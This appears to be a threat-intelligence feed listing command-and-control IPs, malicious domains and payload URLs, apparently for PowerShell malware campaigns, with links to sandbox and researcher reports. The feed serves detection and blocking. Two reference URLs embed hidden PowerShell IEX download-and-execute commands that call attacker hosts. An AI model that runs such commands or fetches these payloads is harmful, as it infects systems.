# Reference: https://www.virustotal.com/gui/file/4805f60425ac421f28e7df371c33b05a0b7a09ab96fe70dedac72fc9c26c33fb/detection
# Reference: https://www.virustotal.com/gui/file/d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d/detection

http://107.172.31.5
http://156.238.227.41
http://167.114.85.75
http://18.230.108.113
http://185.177.239.10
http://185.196.8.34
http://207.231.111.48
http://23.27.51.244
http://44.197.200.249
http://77.97.240.130
http://93.123.109.39
110.41.78.57:8080
110.41.78.57:8443
147.124.212.226:6065
45.200.149.104:5000
47.90.142.15:2333
51.21.41.165:5555
54.83.104.93:1433
62.133.60.69:7777
autoparts-online.us

# Reference: https://x.com/malwrhunterteam/status/1916023291862503587
# Reference: https://www.virustotal.com/gui/file/10f02ed5ce084881608fda64a12b4e3b7b34e0bcaf99789bb957e2d33f0acbd5/detection

savelsares.com

# Reference: https://x.com/malwrhunterteam/status/1918056452108804448
# Reference: https://www.virustotal.com/gui/file/ed49e65c4c3decc5420a560bf72d01a52f11e7184b627f087e07d044b7179b84/detection

codeberg.org/ftap4/AaronYohirs_Test_Junks_lol/raw/branch/main/test2.ps1

# Reference: https://x.com/malwrhunterteam/status/1920491277977612494
# Reference: https://www.virustotal.com/gui/file/5bba8e7b6f31b3bdd2db9562b327e5e464867aeb436c268957ecee9690db181d/detection

http://181.174.164.161

# Reference: https://x.com/malwrhunterteam/status/1920932712866615657
# Reference: https://www.virustotal.com/gui/file/67df661ff72fc94f477bd55f43ad52192b05ea73ea50fdb041afb708fa4171ef/detection

35.158.159.254:18309

# Reference: https://x.com/malwrhunterteam/status/1921283947691917371
# Reference: https://www.virustotal.com/gui/file/6756b5d86df9d04c471a7c288c517b9e29243ba58f59b564ce955a305d50ebc1/detection

198.52.226.7:1238
sexsy2w.ddns.net
ssos.ddns.net
ssosa12.ddns.net
ssosrr.ddns.net

# Reference: https://x.com/JAMESWT_WT/status/1922185649056100727
# Reference: https://github.com/km3dg3/IOCs/blob/main/2025-05-12%20%7C%20UNK%20Stealer%20%7C%20Booking%20ClickFix
# Reference: https://www.virustotal.com/gui/file/5c02bfe719c33a92eeb98c5e871f109b9b0f47b16b37969149f7e8bf052487aa/detection

195.201.108.189:33336

# Reference: https://x.com/malwrhunterteam/status/1922952114805903780
# Reference: https://www.virustotal.com/gui/file/9921a27f076ed0b97258aa551a8fbe89373005271242ea19d43781bd7b0b461c/detection
# Reference: https://www.virustotal.com/gui/file/63a4cf9f9a746bb16554a80638e6b71513ee579819b36751ad053fdf678b3fbe/detection
# Reference: https://www.virustotal.com/gui/file/3d7b27f36fb5bb3ea0da96fad9198db2b8743612de2d2bbca79acc2955e2f87b/detection

80.78.26.235:8990

# Reference: https://x.com/malwrhunterteam/status/1923079196668006790
# Reference: https://www.virustotal.com/gui/file/f84f257b2c66c2bc4a0a54626ad5936443c6b77330e49ca382e61d13263dede5/detection

ielnhduq.213rrfgv.workers.dev
kcopizvn.70federal.workers.dev
orange-silence-43ae.3022protestant.workers.dev

# Reference: https://x.com/malwrhunterteam/status/1924457468567937077
# Reference: https://www.virustotal.com/gui/file/70baad1fc7ed2d05b14f3b30f844e8987f208474e65c107984e6945fad7d4e83/detection

95.214.55.246:8282
nriasoruvd.info
bncisdor.nriasoruvd.info

# Reference: https://x.com/Jane_0sint/status/1924884166711087454
# Reference: https://app.any.run/tasks/d6b763aa-3622-4018-a8c0-da570831793a
# Reference: https://app.validin.com/detail?find=91.103.253.40&type=ip4#tab=host_responses

http://91.103.253.40
91.103.253.40:443
91.103.253.40:8080
91.103.253.40:8443
91.103.253.40:8888

# Reference: https://x.com/Jane_0sint/status/1925079845072965749
# Reference: https://app.any.run/tasks/99bfdbe5-ce86-447c-ae94-1e62d7e68ed2
# Reference: https://www.virustotal.com/gui/file/1c11a58d26c60be5a48823e7d2ff574e3e86e766808e6b97d8082187a4e3d776/detection

http://38.95.173.164

# Reference: https://x.com/skocherhan/status/1925172295862997378
# Reference: https://www.virustotal.com/gui/file/2847b390d3df80579b0e4a2aef3eecb06a2253d209aed90114f24fb4c7212817/detection

adfinity.buzz
bscdjks.pro
edsflps2.pro
enyaa.shop
iko9v5.pro

# Reference: https://x.com/malwrhunterteam/status/1925295578537156975
# Reference: https://www.virustotal.com/gui/file/6bf52b79adbd2b79118700810b8437e2ec2e5e19d599e4e068c8f6f0d76ffc1a/detection
# Reference: https://www.virustotal.com/gui/file/59b04b031aff40bb4a1c7a81219ad61e860a6b0452a99be9294bd0f27a88819a/detection
# Reference: https://www.virustotal.com/gui/file/0e415f71530b9d65e9804d8bc3fb12f53d26e6c27919db32c8a2924e437ecaa7/detection

http://181.174.164.117

# Reference: https://www.virustotal.com/gui/file/a5da401d02053603b68980d3a0837b501ed6d258c77af65236bf73c9a9387f4a/detection

nonever.net

# Reference: https://x.com/malwrhunterteam/status/1925665942358327745
# Reference: https://www.virustotal.com/gui/file/8ada4f8d1be370c1b888e7d04ef3427fd3416b110d260dc5b4c9b72bc6d7f0cd/detection
# Reference: https://www.virustotal.com/gui/file/d51c195b698c411353b10d5b1795cbc06040b663318e220a2d121727c0bb4e43/detection
# Reference: https://www.virustotal.com/gui/file/6cad6a36b95e202140bbcc22eeb8c3ada8b316b57a8ba047a3c4aa603c31b911/detection
# Reference: https://www.virustotal.com/gui/file/ffd69146c5b02305ac74c514cab28d5211a473a6c28d7366732fdc4797425288/detection

45.141.139.222:465

# Reference: https://x.com/malwrhunterteam/status/1925929597499002880
# Reference: https://www.virustotal.com/gui/file/a5f28823626d57c3324aaf93ddb94eed6cc01d6bd815fdfe1fe0c67c93ca8f7d/detection

x0.at/nCgJ.bin

# Reference: https://app.any.run/tasks/e6886dec-cac6-469a-b0e3-7b1d7ce78c37
# Reference: https://www.virustotal.com/gui/file/049717cb511767ba59737ab654fe0141a3ef373e44f0f019c2e398fc14d51418/detection

microsoftech.shop

# Reference: https://www.virustotal.com/gui/file/c7b3edb4ac469044fac6e277e8d44c17ddefb6c0574bea48172cfca93ed6b726/detection

cda-foundations.s3.us-east-1.amazonaws.com

# Reference: https://www.virustotal.com/gui/file/f99f15c3129acabd5a5a60d96ed70c9405efc054ba0b9ad8e434026d80e16b85/detection

0daydreams.net

# Reference: https://x.com/skocherhan/status/1928440873433309326
# Reference: https://x.com/JAMESWT_WT/status/1928471343139275132
# Reference: https://app.any.run/tasks/3b904d30-3831-47b9-81a3-956e17d2dd92
# Reference: https://www.virustotal.com/gui/file/7e7233333d5f8e00d619fd33b9a5df95c3511f29f85bdf2166208c37cbe0a61b/detection
# Reference: https://www.virustotal.com/gui/file/bc3f44f92c6bdb03a0ac5c6ebb4204c1f834f94079161c6591df2ffe4d9d5436/detection

cahasdxca123.com
domainservicecontrol.com

# Reference: https://x.com/malwrhunterteam/status/1929904966610669620
# Reference: https://x.com/salmanvsf/status/1930179705229193583
# Reference: https://x.com/smica83/status/1930356671668453651
# Reference: https://www.virustotal.com/gui/file/d5c6c135a18021938ee93828b48d0b772c2ec870d04bb3c6f89f9abc33f7c798/detection
# Reference: https://www.virustotal.com/gui/file/8e4dd89d9d7c0a15cd79fe9d2891a6b111cfe531c7b4f5c2bbc8ae08e82ed870/detection
# Reference: https://www.virustotal.com/gui/file/ae21a12721baccba97fcd45823afbfc71c864c0c79fa0662aeb0c0dabdb5d8df/detection
# Reference: https://www.virustotal.com/gui/file/b5da6cdea3ceb91a555dd5b74638d55b59dd6376de8f7e26e2c2df671695bfb9/detection
# Reference: https://www.virustotal.com/gui/file/2830bd85e6754e926e050f092822c3276d69f2209ec4b86398033391772b189b/detection
# Reference: https://www.virustotal.com/gui/file/80318e73a2c37c61bedf5f2aa75734141cc3fb15d7f96c7a41d7f9e1abef258e/detection
# Reference: https://www.virustotal.com/gui/file/92718b74bb64fa92fa0e47aae96b7aee59b592abc75c42caa46f2248c587adb9/detection
# Reference: https://www.virustotal.com/gui/file/3481d204f0865577c9643d8d3f0ed45d6555ae4476d43dc80ffc94e0e6a0ddf9/detection

http://5.101.81.42
http://5.101.82.52
http://5.101.83.18

# Reference: https://x.com/smica83/status/1934408123282022751
# Reference: https://www.virustotal.com/gui/file/2c3054c2953053e8c70211587bf33cb26562b3edb3770c91a17f9e49277dd5f2/detection

germanov.xyz

# Reference: https://www.malware-traffic-analysis.net/2025/06/18/index.html
# Reference: https://www.virustotal.com/gui/file/4fa6df014fea29cd34c51a70ecc77fe971457143e3d0da2ad4e0d6ed14a46424/detection

eddereklam.com/drlo.zip
eddereklam.com/tuqw.zip

# Reference: https://x.com/salmanvsf/status/1935590497088852093

pub-a06eb79f0ebe4a6999bcc71a2227d8e3.r2.dev

# Reference: https://x.com/smica83/status/1936554735592476908
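# Reference: https://www.virustotal.com/gui/file/92673255eee7a3b54d07498c2c6cf3d2ea61e800c2594d2f5267143ffc90ef0c/detection
# NOTE(review): example.com is an IANA-reserved documentation domain, so the entry below is presumably a placeholder taken from the sample rather than live infrastructure; keep it scoped to the full path and never widen it to the bare domain - TODO confirm against the sample.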

example.com/load2/src/file.txt

# Reference: https://x.com/smica83/status/1937107452589171103
# Reference: https://www.virustotal.com/gui/file/83b62b39d0fa49698d5bb13b57393b6de01412e7cbea3ab678d21f00b9f01a28/detection
# Reference: https://www.virustotal.com/gui/file/df071df73a1d9a4ea0eb5d62b4d00a08528dbd1ba6f1da91918e02a27e77533e/detection
# Reference: https://www.virustotal.com/gui/file/f2faa4a5f3620f076e02b330eb67a3cfb970d2403f41b79633bf5ee93ec23b82/detection

mintagency.info
careers.mintagency.info
mail.mintagency.info
mt-link.mintagency.info

# Reference: https://x.com/JAMESWT_WT/status/1940105088909156724
# Reference: https://x.com/ShadowOpCode/status/1940334306909618463
# Reference: https://x.com/skocherhan/status/1940324554402144605
# Reference: https://www.virustotal.com/gui/file/26a5e18d6ac86a865250452528664d4cde74187d741fcf98370efb34d4219490/detection
# Reference: https://www.virustotal.com/gui/file/1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75/detection
# Reference: https://www.virustotal.com/gui/file/66bb810e16031a891196487fd8ddc01cb2ac5c95191a49a6360b098d3b9b9bec/detection

180.178.189.17:33338
180.178.189.17:443

# Reference: https://x.com/RussianPanda9xx/status/1940831134759506029

blake-wright-andorra-learners.trycloudflare.com

# Reference: https://www.virustotal.com/gui/ip-address/45.137.22.112/relations
# Reference: https://www.virustotal.com/gui/file/d8604df1be3bb24d3f93433e192bf49635a03cf0ebc319274ec7318668e792bf/detection

45.137.22.112:3389
newgfttgjjk.duckdns.org

# Reference: https://www.virustotal.com/gui/file/bc71f8278a3a040089f3c4c3e92c3adaa8c098bfebb949f5dd14cd2c17c2598d/detection

pub-75d9e09aa5304a0f9b7cd6c04c01b53e.r2.dev

# Reference: https://www.virustotal.com/gui/file/030d719412fc375d9fdfeb2bc12e325d320fc1e0415ee319a481c4f1bc872434/detection

95.214.54.172:7607

# Reference: https://www.virustotal.com/gui/file/12ba178c082a0a281eaf6a742f9ad4bc75940b73a9b186f103b45652d77dd617/detection

141.98.6.34:5554

# Reference: https://x.com/smica83/status/1944502436326002946
# Reference: https://www.joesandbox.com/analysis/1735424#iocs

pesterbdd.com

# Reference: https://x.com/BlinkzSec/status/1944803587302768937
# Reference: https://urlhaus.abuse.ch/url/3583285/

hollywoodcafeonmain.com/wplus.ps1

# Reference: https://www.virustotal.com/gui/file/eefdc013fae015be06900c47d879e402cfea2ddd6a24db11b4007ccefc27e8df/detection

104.207.148.168:8080

# Reference: https://x.com/ElementalX2/status/1945145930954469761
# Reference: https://www.virustotal.com/gui/file/6c5a89c3dd7b596fd1be2aa88eddb3234bf6f006638c9bb3e04c33f416d28080/detection
# Reference: https://www.virustotal.com/gui/file/8556f07ceb37e726a66c357cb3b76bba1eb13c21ffe85fdb37685ecfd06205db/detection
# Reference: https://www.virustotal.com/gui/file/9d95228173bf5f29bc3d26f19e2962ca65fab572095aeafd955bde7df574ee9c/detection

http://5.101.80.15

# Reference: https://x.com/k3yp0d/status/1945771813868314758
# Reference: https://bsky.app/profile/k3yp0d.bsky.social/post/3lu5l5t5eq22o
# Reference: https://www.deepinstinct.com/blog/no-macro-no-worries-vsto-being-weaponized-by-threat-actors
# Reference: https://www.virustotal.com/gui/file/b3282dc58ad961911d94b712cea11f649b0ba785d7ff74d7ed9946e1260dd521/detection

34.241.171.114:443
classicfonts.live

# Reference: https://www.virustotal.com/gui/file/f1c217fa4e46b9a4df22adea62d1acd4f3016c1aac17737611f4f178bfcf1bc1/detection

http://89.221.217.65

# Reference: https://www.virustotal.com/gui/file/ae71cb4c8c5c46b04e12731f9184f829e5f4fb71460fda8089ece9aeaf815aee/detection

illegalwebsite.com

# Reference: https://app.validin.com/detail?find=powershell%20IEX(New-Object%20Net.Webclient).DownloadString(http%3A%2F%2Fde1c5dc3da78.eu.ngrok.io)&type=raw&ref_id=5c1a9b34db7 (# 2025-07-19)

de1c5dc3da78.eu.ngrok.io

# Reference: https://app.validin.com/detail?find=powershell%20-WindowStyle%20Hidden%20IEX%20(New-Object%20Net.WebClient).DownloadString(%27https%3A%2F%2Fshinobotps1.com%2Fdownload_get.php%27)%3B&type=raw&ref_id=5c1a9b34db7 (# 2025-07-19)

shinobotps1.com
shinohack.me

# Reference: https://www.virustotal.com/gui/file/35f27fb2e665ca608d9b94ba89750ed27aed82aa554806ebe3d8ce9bec7508dc/detection

pa.reyes-holdings.uk

# Reference: https://x.com/smica83/status/1947624319430922338
# Reference: https://tria.ge/250722-nrah9svwbz/behavioral1
# Reference: https://tria.ge/250719-q8eweswqv9/behavioral2

66.63.187.20:8000
burden-psp-holding-evaluation.trycloudflare.com
j-bookmarks-annie-possess.trycloudflare.com

# Reference: https://www.virustotal.com/gui/file/a31eba665f419b0d35d43cbb84ba31851cb6bdef6bf2ac239866bdcda532342f/detection

intuite.icu
intuite.info

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/refs/heads/master/feeds/IPPortC2s-90day.csv (# 2025-07-26)

195.66.213.157:443

# Reference: https://x.com/1nt3l_hunt/status/1949849917599400278

87.121.221.113:9090

# Reference: https://x.com/volrant136/status/1949856151610233052

doublecounter.cfd
doublecounter.fun
doublecounter.top

# Reference: https://x.com/ShadowOpCode/status/1950933939998097676
# Reference: https://www.virustotal.com/gui/file/54ed8df92b06ede84497598d70f41779697ee4a03c8fc1496a47ea0ea45d1ad9/detection

http://216.9.224.88

# Reference: https://www.pointwild.com/threat-intelligence/trojan-winlnk-powershell-runner
# Reference: https://www.virustotal.com/gui/file/506ecb76cf8e39743ec06129d81873f0e4c1ebfe7a352fc5874d0fc60cc1d7c6/detection
# Reference: https://www.virustotal.com/gui/file/d6811b643d0ec877760e780d87a0993e04d3b37177f8e004f913e25b5a5faefe/detection

mal289re1.es
uldg354.eu
shipping-hr.ro

# Reference: https://x.com/1ZRR4H/status/1952495584730071482
# Reference: https://www.virustotal.com/gui/file/aa23f21bae3d3bbe722bcd03aaf8c440bede9a5ec01d3840f87567ea41925c98/detection

http://144.91.103.204

# Reference: https://x.com/smica83/status/1952416486343229708
# Reference: https://tria.ge/250804-vm5xyas1bv/behavioral1

andrefelipedonascime1753562407700.0461178.meusitehostgator.com.br
/JIBXKFGnby_3/

# Reference: https://x.com/smica83/status/1952409663367975089
# Reference: https://www.virustotal.com/gui/file/8c882a44da33b7ea1e3992423525404c785570008ec9cac0e41027912ad6e23c/detection

http://64.7.198.123
96.9.124.209:8080

# Reference: https://www.virustotal.com/gui/file/fc1ebd19fb145efc56c192c3f6baa32a0f69311c995b2316cf13371316b53ec1/detection

control2lecture.store
hungnzshinklshk.ink

# Reference: https://x.com/smica83/status/1954613441009750341
# Reference: https://www.virustotal.com/gui/file/10dd3d8c69c28d05aa1b29440d576362ecc901c5da270d655ff1a853f732e73a/detection

3-4px.pages.dev

# Reference: https://x.com/smica83/status/1954897718524232137
# Reference: https://www.virustotal.com/gui/file/cd5fd6a6e81efd1eade5693597330c7cd1476ebbf5f425e0ac476d4a2ad4f4cf/detection

valmamagenta.workers.dev
telegram-worker.valmamagenta.workers.dev

# Reference: https://x.com/ShadowOpCode/status/1954853970012238296
# Reference: https://www.virustotal.com/gui/file/508591e3e426219da8658096aa48fa5658ef6ef67badcf4c4f316d5396578feb/detection

doublemanfs.com

# Reference: https://g0njxa.medium.com/meowsterio-weaponizing-clickonce-in-2025-8c2595a817c8
# Reference: https://www.virustotal.com/gui/file/c7e13b2ad0523b701e1ccbfe6cb77d63b55c6a41f645bc9a6c98c8d8ff82c61b/detection
# Reference: https://www.virustotal.com/gui/file/97eba8090a2a043125862667d9d37dc0e1a36613ac7e3a37826e56d63a78bc73/detection
# Reference: https://www.virustotal.com/gui/file/846dd064b89ba2eea0cdea76f4f660fd2ebc0bb4c007b10f46e565c9ec9848a9/detection

178.250.188.57:38493

# Reference: https://x.com/ElementalX2/status/1955509557272203486
# Reference: https://app.validin.com/detail?find=188.244.191.61&type=ip4&ref_id=4d62866933c#tab=resolutions
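# Reference: https://www.virustotal.com/gui/file/20665f5812fa6ed99ebef18203e0d333805728ceb7342afdbbb33e6579040edc/detection
# NOTE(review): the 216.239.3x.21 addresses below appear to belong to Google's hosted-domain front ends, so they are likely where the dynamic-DNS names resolved rather than dedicated C2 hosts; keep the :7070 port qualifier to limit false positives - TODO confirm.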

216.239.32.21:7070
216.239.34.21:7070
216.239.38.21:7070
blog.ddnsking.com
blog.hldns.ru
blog.sytes.net
blog.zapto.org

# Reference: https://www.fortinet.com/blog/threat-research/clickfix-to-command-a-full-powershell-attack-chain
# Reference: https://www.virustotal.com/gui/file/bc157725ccfe5c3c0fbd8e1c0361defec593601eaa42a9a8dbff93309148cc38/detection

pharmacynod.com

# Reference: https://blog.talosintelligence.com/ps1bot-malvertising-campaign/
# Reference: https://github.com/Cisco-Talos/IOCs/blob/main/2025/08/ps1bot-malvertising-campaign.txt

http://109.120.179.170
http://131.174.164.238
http://147.45.45.168
http://181.174.164.12
http://181.174.164.170
http://181.174.164.180
http://181.174.164.2
http://181.174.164.201
http://181.174.164.238
http://181.174.164.47
http://213.176.113.168
http://5.252.153.94
http://62.60.178.24
http://77.110.116.227

# Reference: https://x.com/JAMESWT_WT/status/1955883901299101776
# Reference: https://www.virustotal.com/gui/file/d51f81ee026df39447143b67eaf16326c30e0c9477c0d50507f1fbfffe53abd6/detection

102.135.95.102:7777

# Reference: https://x.com/ShadowOpCode/status/1955988458645668169
# Reference: https://app.any.run/tasks/36e5dd2e-5674-48e5-90c1-1653d53b3f7b

macino21.gt.tc

# Reference: https://www.virustotal.com/gui/file/219aac79d17dacb27f7fd1fbd62a435f3b4ea7054d086e8962fafe334dc55680/detection

84.21.189.228:5504

# Reference: https://securityaffairs.com/181203/cyber-crime/encrypthub-abuses-brave-support-in-new-campaign-exploiting-msc-eviltwin-flaw.html
# Reference: https://app.validin.com/detail?find=a959f63897979d907ef8ad21e2c971ae&type=hash&ref_id=3bdd9b9ae65#tab=host_pairs (# 2025-08-17)
# Reference: https://app.validin.com/detail?find=1ca931e6876392468fdb732e580cf7ad&type=hash&ref_id=3bdd9b9ae65#tab=host_pairs (# 2025-08-17)
# Reference: https://app.validin.com/detail?find=80d8bea73badb21e88306c6f387aed64&type=hash&ref_id=3bdd9b9ae65#tab=host_pairs (# 2025-08-17)
# Reference: https://www.virustotal.com/gui/file/eab7d0b897d425a2fce561a609692d810a456e93956cb0db1843f823be406bc7/detection

audiorealtek.com
bitacid.net
cjhsbam.com
reaitek.com
rivatalk.net
soft-gets.com
xn----8sbn4abdhnl.com
api.rivatalk.net
fastdomain-uoemathhvq.workers.dev
safesurf.fastdomain-uoemathhvq.workers.dev

# Reference: https://x.com/JAMESWT_WT/status/1957028393221800020
# Reference: https://tria.ge/250817-lypknatzew/behavioral1

196.251.72.192:1234

# Reference: https://www.virustotal.com/gui/file/5f3e26e42fd5e449cb388298ca92e36434c21705d6db45226d10ecdb11dfee8d/detection

95.164.53.214:5554

# Reference: https://x.com/smica83/status/1957723516918460493
# Reference: https://www.virustotal.com/gui/ip-address/31.57.35.90/relations
# Reference: https://www.virustotal.com/gui/file/3860ee4d50aafb58a16ed8713cbdebc2bb044b61c2475c38848660bb0d25b093/detection
# Reference: https://www.virustotal.com/gui/file/035bcada4326a06d28fb3b6aa9e833facc5b9e1fe2eb931a53dd1ac2050b1b67/detection

http://31.57.35.90
31.57.35.90:9555
esdras.ddns.net
farzads.asuscomm.com
neoesdras.ddns.net

# Reference: https://x.com/smica83/status/1957719173959733371
# Reference: https://tria.ge/250819-j5vzxa1rt4/behavioral1

provrm.ru
/d1ovu/pon/raw/refs/heads/main/res.bat

# Reference: https://x.com/smica83/status/1958604670135673077
# Reference: https://www.virustotal.com/gui/file/f7aa5a03767a01c819d6b504b70ad1f1cc51a269f17346787512746a5af3573d/detection

/k53xupn43/i965652f/refs/heads/main/m.ps1

# Reference: https://x.com/smica83/status/1958799973773942959
# Reference: https://x.com/JAMESWT_WT/status/1960296641728012587
# Reference: https://tria.ge/250822-jr8nvadp9x/behavioral1
# Reference: https://app.any.run/tasks/45637a70-ead4-4141-91de-31b51ecdcbdb

103.63.28.71:1433
103.63.28.71:2024

# Reference: https://x.com/smica83/status/1958804084879741067
# Reference: https://www.virustotal.com/gui/file/fe814a3b59fc8e874288f81c96625ccba75a07b953bef3ac8d6acd4832f51d53/detection

/hectorp12/respaldo1212/main/cmd.txt

# Reference: https://x.com/smica83/status/1958921706979963239
# Reference: https://tria.ge/250822-teev4swqs4/behavioral1

/api/file/wQ4vTmBA

# Reference: https://x.com/JAMESWT_WT/status/1959198084556267909
# Reference: https://app.any.run/tasks/56cc97d3-31e4-4b6f-aa99-ec2f28e7182d
# Reference: https://www.virustotal.com/gui/file/b018115f3ccac4d1b0fd586e6ab8da27492cbe53dbaa87a4bf42ef7fd79d0803/detection

huygtryguh.lol

# Reference: https://x.com/smica83/status/1959719935908643203
# Reference: https://tria.ge/250824-zhbwhsyvct/behavioral1

pottery-determination-oakland-kingston.trycloudflare.com
victim-mar-tones-outreach.trycloudflare.com

# Reference: https://x.com/smica83/status/1959585629647647007
# Reference: https://tria.ge/250824-n253xstzbx/behavioral1

bbrlxwtkbgvpnpfykexu.supabase.co

# Reference: https://x.com/k3yp0d/status/1959853255074189455
# Reference: https://app.any.run/tasks/eb4538dc-7efc-4e8c-a642-cc1251eba849
# Reference: https://www.virustotal.com/gui/ip-address/91.245.254.76/relations
# Reference: https://app.validin.com/detail?find=9b8a19bce8022f7cddff522e62c63dfc&type=hash&ref_id=6b92f485b65#tab=host_pairs (# 2025-08-25)
# Reference: https://www.virustotal.com/gui/file/c7e9bb895c490c5fe8db36a67a3393e1a3d0b49ffb8c0fe0cb3f4272b7a9e3ec/detection

1kkk-ebr.pages.dev
1kkve.pages.dev
70addb0e.redirectto-zz6.pages.dev
actupon.it.com
approving.it.com
are-you-human.pages.dev
begins.it.com
benten.ink
bestpicked.best
blabberingmate.com
brightsite.it.com
buzzingflybees.com
bx55kelly.pages.dev
carabineros.top
cloudingcdn.biz
desiload.art
desmok.shop
ferari1.email
ferrabits.com
flashwebonline.org
fre-sec.pages.dev
gemmrktoffer.org
gocomplete.it.com
gucproceed.pages.dev
hencook.work
jekitech.cloud
lanterncoast.com
leadingzones.live
letscomplete.it.com
letsprove.it.com
lilder.top
llder.top
loadingnext.fit
monakovi.pages.dev
nextstepgo.pages.dev
nowget.it.com
onward.it.com
passon.it.com
pestern.pages.dev
power-walk.info
prass.pages.dev
proceed.it.com
proceedingto.pages.dev
redirectto-zz6.pages.dev
resolviaglobal.com
ritavoi.com
robinvilla.it.com
royce.city
roycebits.com
royevita.com
rusu.blog
saintlaur.pages.dev
secad.pages.dev
secas.pages.dev
serveweb-2rj.pages.dev
singlelink.pages.dev
speedyhare.club
spintowin.shop
ssdash.pages.dev
summitvia.com
tesesern881.pages.dev
turismo555.website
tutag.top
urusbits.com
uruvita.com
venai.pages.dev
verify-if-human.pages.dev
visithub.best
yexteral.pages.dev

# Reference: https://www.virustotal.com/gui/ip-address/87.251.69.66/relations

aryudrfesr.buzz
brtygfwfrt.buzz
cdnsecure.best
cloudsecuity.best
cloudsecurity.best
crwecgivgy.buzz
drioaryase.buzz
errtjhohyu.buzz
passto.it.com

# Reference: https://x.com/Merlax_/status/1960048599678493033
# Reference: https://www.virustotal.com/gui/file/3552b1fded77d4c0ec440f596de12f33be29c5a0b5463fd157c0d27259e5a2df/detection

mezi.bet
rs.mezi.bet

# Reference: https://x.com/k3dg3/status/1959997478335648092
# Reference: https://tria.ge/250825-sehrbsak7v/behavioral1

185.28.119.179:1234

# Reference: https://x.com/smica83/status/1960344607226531966
# Reference: https://tria.ge/250826-rea6tazsht/behavioral1

http://168.100.10.73
168.100.10.73:5000

# Reference: https://x.com/smica83/status/1960614147990683698

/hi4201225/gv725/
/ud-progen2/725-mrw/

# Reference: https://www.virustotal.com/gui/file/3ad68200bdff9069561ff7bf99a913ee24ad8409398dde4f3adb5d6cbea07788/detection

212.22.86.82:2020

# Reference: https://x.com/JAMESWT_WT/status/1963825407939006749
# Reference: https://www.malware-traffic-analysis.net/2025/09/03/index.html

85.209.129.105:2020

# Reference: https://x.com/drb_ra/status/1961062947175694451

185.235.178.14:443

# Reference: https://x.com/JAMESWT_WT/status/1961292003620102532
# Reference: https://app.any.run/tasks/c098d1df-add9-4995-b164-1c20c1fd51be
# Reference: https://www.virustotal.com/gui/file/e5b8a45ac9d7d834bb73cff512a680bf0926d97ee5410601f503b27cbd80bbb4/detection
# Reference: https://www.virustotal.com/gui/file/7309e3ed236fcf61a68680a73fc6f8c740476504cac0dd6b2dd31b7331fec7e9/detection

bilaskf.com

# Reference: https://www.virustotal.com/gui/ip-address/176.96.137.225/relations
# Reference: https://www.virustotal.com/gui/file/e7a7afbb64b3329705966fa898676d24d95967a7a782ccaccebf7713a68bbb47/detection

app-download-pc.accesscam.org
app-download-pc.freeddns.org
app-download.loseyourip.com
app-driver.kozow.com
dcccd.accesscam.org
downlad-x.casacam.net
downlad.camdvr.org
shorten-urls.kozow.com
shorten-urls.work.gd

# Reference: https://x.com/smica83/status/1961680045438558405
# Reference: https://tria.ge/250830-heq3lavwax/behavioral1

andrefelipedonascime1756166725866.0531865.meusitehostgator.com.br

# Reference: https://www.virustotal.com/gui/file/bd7f85666f40b09884c13443a404389ba18708d3c8cafca7371522f563d83856/detection

http://5.8.19.43
5.8.19.43:443

# Reference: https://x.com/JAMESWT_WT/status/1963463508353286359
# Reference: https://app.any.run/tasks/b007ae14-b021-4d3d-9e71-7f3b2d5fa508
# Reference: https://www.virustotal.com/gui/file/e2773afcc680bcafa076687dd51785fa99b0fba77e4765b1c4f64b6278522edd/detection

biokdsl.com

# Reference: https://x.com/BlinkzSec/status/1963186318382452968
# Reference: https://www.virustotal.com/gui/file/61ec38741f1b45c5e797ab56bedc01f63fb089d1946f978a1ba735602e2cb455/detection

starmanx.org

# Reference: https://www.virustotal.com/gui/file/789df0bfdf91c7990542d571597ab7baf8789fb114bd2426ba595d116870f22e/detection

81.21.1.205:4531

# Reference: https://www.virustotal.com/gui/file/ee4960b8b58b91c85ee01ebc6f40752dd0dcb04c2695428da507484670f1091a/detection

34.132.183.57:5552
frygzjyhtiunvhvnacif.supabase.co
win2325.webredirect.org

# Reference: https://x.com/malwrhunterteam/status/1964034069894754812
# Reference: https://www.virustotal.com/gui/file/56aa74793533fdcfd26449e66295adb31a920afc9993005c27a4e274f4196f4a/detection
# Reference: https://www.virustotal.com/gui/file/84f34f24a7f7852ac1c5e99ec3de6e215138d7b8a39514963dc6596945b105d8/detection

http://185.193.125.160
ololo-dsj.pages.dev
yr52byzdja.pages.dev
42a25631.yr52byzdja.pages.dev

# Reference: https://x.com/smica83/status/1965698562706313405
# Reference: https://tria.ge/250910-kner2axxbz/behavioral1

5.2.217.61:4444

# Reference: https://x.com/ShadowOpCode/status/1966143414489227695
# Reference: https://www.virustotal.com/gui/file/37e96cc01fcf657c68d05cb1814e63eaa46582c21a23edec1a8e5d6d81257f9c/detection

rihby.com

# Reference: https://www.virustotal.com/gui/file/081921671d15071723cfe979633a759a36d1d15411f0a6172719b521458a987d/detection

80.253.249.186:5504

# Reference: https://www.virustotal.com/gui/file/0127c758de634d04ae1c721ad2d8ce63574366e83dd140ad1a34d8f75418b712/detection
# Reference: https://www.virustotal.com/gui/file/5534ca1aa6be7ecd2f94e13509d9d464579b6e5ee87b02884bceee424dfe999e/detection
# Reference: https://www.virustotal.com/gui/file/807e2578fb2c305ec05b9378ee3f8cc6cab2ca431313d3b84d6f0db6ee8f5656/detection

csend.net

# Reference: https://x.com/smica83/status/1970604652694585853
# Reference: https://www.virustotal.com/gui/file/e1fe9bbaaf7f480d6e8404c2f87d76d61abeace6120ee39b327af8188d1076a8/detection

ms-distro.space
appl.endl.site
sixsixsix.ms-distro.space

# Reference: https://x.com/solostalking/status/1971560418041819283

neutronsparty.live

# Reference: https://tria.ge/251001-njz4ysxlx7/behavioral1
# Reference: https://www.virustotal.com/gui/file/03446e7dc87a01a5eac65bc3d82b02a488393cd2d6bd213ab3d90ffca25d6456/detection

134.255.211.63:8443
garphicbelos.com
sub.garphicbelos.com

# Reference: https://x.com/smica83/status/1975087975831843078
# Reference: https://www.virustotal.com/gui/file/b521c89d99dfd6a4e14d93db4a226a484ca6297b699d8dc716156dda84bd22a5/detection

elegant-starburst-d473a1.netlify.app

# Reference: https://x.com/smica83/status/1974947405910155548
# Reference: https://www.virustotal.com/gui/file/1bcc710829bf29f31834501f4b331d89089c16f1c3bf9fefcaabd8c3ead66aad/detection
